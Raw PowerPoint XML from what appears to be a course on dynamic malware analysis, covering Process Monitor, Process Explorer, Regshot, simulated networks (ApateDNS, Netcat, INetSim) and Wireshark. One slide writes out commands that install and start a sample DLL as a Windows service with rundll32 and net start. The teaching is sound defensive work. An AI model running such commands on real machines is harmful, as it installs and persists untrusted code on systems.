              <a:rPr lang="en-GB" sz="2400">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
                <a:latin typeface="Teko"/>
                <a:ea typeface="Teko"/>
                <a:cs typeface="Teko"/>
                <a:sym typeface="Teko"/>
              </a:rPr>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr i="1" lang="en-GB" sz="2400">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
                <a:latin typeface="Teko"/>
                <a:ea typeface="Teko"/>
                <a:cs typeface="Teko"/>
                <a:sym typeface="Teko"/>
              </a:rPr>
              <a:t>Install</a:t>
            </a:r>
            <a:endParaRPr i="1" sz="2400">
              <a:solidFill>
                <a:schemeClr val="dk1"/>
              </a:solidFill>
              <a:latin typeface="Teko"/>
              <a:ea typeface="Teko"/>
              <a:cs typeface="Teko"/>
              <a:sym typeface="Teko"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="546" name="Google Shape;546;p51"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2074550" y="5877272"/>
            <a:ext cx="6025841" cy="830997"/>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2400">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
                <a:latin typeface="Teko"/>
                <a:ea typeface="Teko"/>
                <a:cs typeface="Teko"/>
                <a:sym typeface="Teko"/>
              </a:rPr>
              <a:t>C:\rundll32.exe  </a:t>
            </a:r>
            <a:r>
              <a:rPr i="1" lang="en-GB" sz="2400">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
                <a:latin typeface="Teko"/>
                <a:ea typeface="Teko"/>
                <a:cs typeface="Teko"/>
                <a:sym typeface="Teko"/>
              </a:rPr>
              <a:t>ipr32xdll</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="2400">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
                <a:latin typeface="Teko"/>
                <a:ea typeface="Teko"/>
                <a:cs typeface="Teko"/>
                <a:sym typeface="Teko"/>
              </a:rPr>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr i="1" lang="en-GB" sz="2400">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
                <a:latin typeface="Teko"/>
                <a:ea typeface="Teko"/>
                <a:cs typeface="Teko"/>
                <a:sym typeface="Teko"/>
              </a:rPr>
              <a:t>InstallService ServiceName</a:t>
            </a:r>
            <a:endParaRPr i="1" sz="2400">
              <a:solidFill>
                <a:schemeClr val="dk1"/>
              </a:solidFill>
              <a:latin typeface="Teko"/>
              <a:ea typeface="Teko"/>
              <a:cs typeface="Teko"/>
              <a:sym typeface="Teko"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" marR="0" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-GB" sz="2400">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
                <a:latin typeface="Teko"/>
                <a:ea typeface="Teko"/>
                <a:cs typeface="Teko"/>
                <a:sym typeface="Teko"/>
              </a:rPr>
              <a:t>C:\net start </a:t>
            </a:r>
            <a:r>
              <a:rPr i="1" lang="en-GB" sz="2400">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
                <a:latin typeface="Teko"/>
                <a:ea typeface="Teko"/>
                <a:cs typeface="Teko"/>
                <a:sym typeface="Teko"/>
              </a:rPr>
              <a:t>ServiceName</a:t>
            </a:r>
            <a:endParaRPr i="1" sz="2400">
              <a:solidFill>
                <a:schemeClr val="dk1"/>
              </a:solidFill>
              <a:latin typeface="Teko"/>
              <a:ea typeface="Teko"/>
              <a:cs typeface="Teko"/>
              <a:sym typeface="Tek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2"/>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Dynamic Malware Analysis</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="553" name="Google Shape;553;p52"/>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Process Monitoring (procmon.exe)</a:t>
            </a:r>
            <a:endParaRPr b="1"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="554" name="Google Shape;554;p52"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill rotWithShape="1">
          <a:blip r:embed="rId3">
            <a:alphaModFix/>
          </a:blip>
          <a:srcRect b="0" l="0" r="0" t="0"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="790568" y="1700808"/>
            <a:ext cx="7994912" cy="490933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3"/>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Dynamic Malware Analysis</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="560" name="Google Shape;560;p53"/>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Process Monitoring –&gt; Filter</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="-285750" lvl="1" marL="742950" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="560"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPts val="2800"/>
              <a:buChar char="–"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-GB"/>
              <a:t>Important fields: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB">
                <a:latin typeface="Teko"/>
                <a:ea typeface="Teko"/>
                <a:cs typeface="Teko"/>
                <a:sym typeface="Teko"/>
              </a:rPr>
              <a:t>Process Name</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB">
                <a:latin typeface="Teko"/>
                <a:ea typeface="Teko"/>
                <a:cs typeface="Teko"/>
                <a:sym typeface="Teko"/>
              </a:rPr>
              <a:t>Operation</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB">
                <a:latin typeface="Teko"/>
                <a:ea typeface="Teko"/>
                <a:cs typeface="Teko"/>
                <a:sym typeface="Teko"/>
              </a:rPr>
              <a:t>Detail</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="-285750" lvl="1" marL="742950" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="560"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPts val="2800"/>
              <a:buChar char="–"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-GB"/>
              <a:t>Common functions: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB">
                <a:latin typeface="Teko"/>
                <a:ea typeface="Teko"/>
                <a:cs typeface="Teko"/>
                <a:sym typeface="Teko"/>
              </a:rPr>
              <a:t>RegSetValue</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB"/>
              <a:t>; </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB">
                <a:latin typeface="Teko"/>
                <a:ea typeface="Teko"/>
                <a:cs typeface="Teko"/>
                <a:sym typeface="Teko"/>
              </a:rPr>
              <a:t>CreateFile</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB"/>
              <a:t>; </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB">
                <a:latin typeface="Teko"/>
                <a:ea typeface="Teko"/>
                <a:cs typeface="Teko"/>
                <a:sym typeface="Teko"/>
              </a:rPr>
              <a:t>WriteFile</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB"/>
              <a:t>.</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="-76200" lvl="2" marL="1143000" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="480"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPts val="2400"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:t/>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="-76200" lvl="2" marL="1143000" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="480"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPts val="2400"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:t/>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="561" name="Google Shape;561;p53"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill rotWithShape="1">
          <a:blip r:embed="rId3">
            <a:alphaModFix/>
          </a:blip>
          <a:srcRect b="0" l="0" r="0" t="0"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="1547664" y="2717648"/>
            <a:ext cx="6268292" cy="407185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4"/>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Dynamic Malware Analysis</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="567" name="Google Shape;567;p54"/>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Process Explorer (procexp.exe)</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="-285750" lvl="1" marL="742950" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="400"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPts val="2000"/>
              <a:buChar char="–"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-GB" sz="2000"/>
              <a:t>Name</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="-285750" lvl="1" marL="742950" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="400"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPts val="2000"/>
              <a:buChar char="–"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-GB" sz="2000"/>
              <a:t>PID</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="-285750" lvl="1" marL="742950" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="400"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPts val="2000"/>
              <a:buChar char="–"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-GB" sz="2000"/>
              <a:t>CPU</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="-285750" lvl="1" marL="742950" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="400"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPts val="2000"/>
              <a:buChar char="–"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-GB" sz="2000"/>
              <a:t>Description</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="-285750" lvl="1" marL="742950" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="400"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPts val="2000"/>
              <a:buChar char="–"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-GB" sz="2000"/>
              <a:t>Company</a:t>
            </a:r>
            <a:endParaRPr sz="2000"/>
          </a:p>
          <a:p>
            <a:pPr indent="-152400" lvl="0" marL="342900" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="600"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPts val="3000"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:t/>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="568" name="Google Shape;568;p54"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill rotWithShape="1">
          <a:blip r:embed="rId3">
            <a:alphaModFix/>
          </a:blip>
          <a:srcRect b="0" l="0" r="0" t="0"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="2339752" y="1800191"/>
            <a:ext cx="6810524" cy="460031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5"/>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Dynamic Malware Analysis</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="574" name="Google Shape;574;p55"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph idx="1" type="body"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="457200" y="1196752"/>
            <a:ext cx="4546848"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Process Explorer -&gt; Verify</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="-285750" lvl="1" marL="742950" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="480"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPts val="2400"/>
              <a:buChar char="–"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-GB" sz="2400"/>
              <a:t>MS uses digital signatures for most of its core executables.</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="-285750" lvl="1" marL="742950" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="480"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPts val="2400"/>
              <a:buChar char="–"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-GB" sz="2400"/>
              <a:t>Malware often replaces authentic Windows files with its own in an attempt to hide</a:t>
            </a:r>
            <a:endParaRPr sz="2400"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="575" name="Google Shape;575;p55"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill rotWithShape="1">
          <a:blip r:embed="rId3">
            <a:alphaModFix/>
          </a:blip>
          <a:srcRect b="0" l="0" r="0" t="0"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="5004048" y="1193673"/>
            <a:ext cx="4044500" cy="511564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6"/>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Dynamic Malware Analysis</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="581" name="Google Shape;581;p56"/>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Process Explorer -&gt; Compare Strings </a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="-285750" lvl="1" marL="742950" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="480"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPts val="2400"/>
              <a:buChar char="–"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-GB" sz="2400"/>
              <a:t>Compare strings contained in the disk executables (images)against strings in memory to recognize the replacements</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="1" marL="457200" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="560"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPts val="2800"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:t/>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="-152400" lvl="0" marL="342900" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="600"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPts val="3000"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:t/>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="582" name="Google Shape;582;p56"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill rotWithShape="1">
          <a:blip r:embed="rId3">
            <a:alphaModFix/>
          </a:blip>
          <a:srcRect b="0" l="0" r="0" t="0"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="2267744" y="2958608"/>
            <a:ext cx="5832648" cy="357399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id="587" name="Google Shape;587;p57"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill rotWithShape="1">
          <a:blip r:embed="rId3">
            <a:alphaModFix/>
          </a:blip>
          <a:srcRect b="0" l="0" r="0" t="0"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="611560" y="3068960"/>
            <a:ext cx="8010525" cy="3028950"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="588" name="Google Shape;588;p57"/>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Dynamic Malware Analysis</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="589" name="Google Shape;589;p57"/>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Comparing Registry snapshots by </a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en-GB">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Regshot</a:t>
            </a:r>
            <a:endParaRPr b="1">
              <a:solidFill>
                <a:srgbClr val="FF0000"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="590" name="Google Shape;590;p57"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill rotWithShape="1">
          <a:blip r:embed="rId4">
            <a:alphaModFix/>
          </a:blip>
          <a:srcRect b="0" l="0" r="0" t="0"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="4770449" y="1792501"/>
            <a:ext cx="4281292" cy="43242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58"/>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Faking a Network</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="596" name="Google Shape;596;p58"/>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GB"/>
              <a:t>Malware often beacons out and eventually communicates with a command-and-control server. </a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="-342900" lvl="0" marL="342900" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="555"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPct val="100000"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-GB"/>
              <a:t>A fake network allows us to obtain network indicators (DNS names, IP, packet signatures) without connecting to the Internet.</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="-342900" lvl="0" marL="342900" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="555"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPct val="100000"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-GB"/>
              <a:t>Some malware can realise that it is executing in a virtualized environment (e.g. VMware).</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="-342900" lvl="0" marL="342900" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="555"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPct val="100000"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-GB"/>
              <a:t>Tools:</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="-285750" lvl="1" marL="742950" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="518"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPct val="100000"/>
              <a:buChar char="–"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-GB"/>
              <a:t>ApateDNS</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="-285750" lvl="1" marL="742950" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="518"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPct val="100000"/>
              <a:buChar char="–"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-GB"/>
              <a:t>Netcat</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="-285750" lvl="1" marL="742950" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="518"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPct val="100000"/>
              <a:buChar char="–"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-GB"/>
              <a:t>FakeNet</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9"/>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Faking a Network</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="602" name="Google Shape;602;p59"/>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ApateDNS (sdl-apateDNS)</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="400"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPts val="2000"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-GB" sz="2000"/>
              <a:t>(</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="2000" u="sng">
                <a:solidFill>
                  <a:schemeClr val="hlink"/>
                </a:solidFill>
                <a:hlinkClick r:id="rId3"/>
              </a:rPr>
              <a:t>https://www.fireeye.com/services/freeware/apatedns.html</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="2000"/>
              <a:t>) </a:t>
            </a:r>
            <a:endParaRPr sz="2000"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="603" name="Google Shape;603;p59"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill rotWithShape="1">
          <a:blip r:embed="rId4">
            <a:alphaModFix/>
          </a:blip>
          <a:srcRect b="0" l="0" r="0" t="0"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="1331640" y="2145049"/>
            <a:ext cx="6621016" cy="44399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6"/>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Introduction</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="132" name="Google Shape;132;p6"/>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Malicious code/Malware</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="-285750" lvl="1" marL="742950" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="480"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPts val="2400"/>
              <a:buChar char="–"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-GB" sz="2400"/>
              <a:t>A programming code that is capable of causing harm to availability, integrity of code or data, or confidentiality in a computing system encompasses including virus, Trojan horse, worm, rootkit, scareware, spyware.</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="-285750" lvl="1" marL="742950" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="480"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPts val="2400"/>
              <a:buChar char="–"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-GB" sz="2400"/>
              <a:t>A set of instructions that run on your computer and make your system do something that an attacker wants it to do.</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0"/>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Network Monitoring</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="609" name="Google Shape;609;p60"/>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Netcat</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="-285750" lvl="1" marL="742950" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="560"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPts val="2800"/>
              <a:buChar char="–"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-GB"/>
              <a:t>Monitoring common ports used by malwares (80, 443, …)</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="610" name="Google Shape;610;p60"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill rotWithShape="1">
          <a:blip r:embed="rId3">
            <a:alphaModFix/>
          </a:blip>
          <a:srcRect b="0" l="0" r="0" t="0"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="249034" y="3356992"/>
            <a:ext cx="8867921" cy="172393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1"/>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Network Monitoring</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="617" name="Google Shape;617;p61"/>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INetSim (</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" u="sng">
                <a:solidFill>
                  <a:schemeClr val="hlink"/>
                </a:solidFill>
                <a:hlinkClick r:id="rId3"/>
              </a:rPr>
              <a:t>www.inetsim.org</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB"/>
              <a:t>): Linux-based app</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="618" name="Google Shape;618;p61"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill rotWithShape="1">
          <a:blip r:embed="rId4">
            <a:alphaModFix/>
          </a:blip>
          <a:srcRect b="0" l="0" r="0" t="0"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="1979712" y="1988841"/>
            <a:ext cx="5786970" cy="409078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2"/>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Network Monitoring</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="624" name="Google Shape;624;p62"/>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Wireshark</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
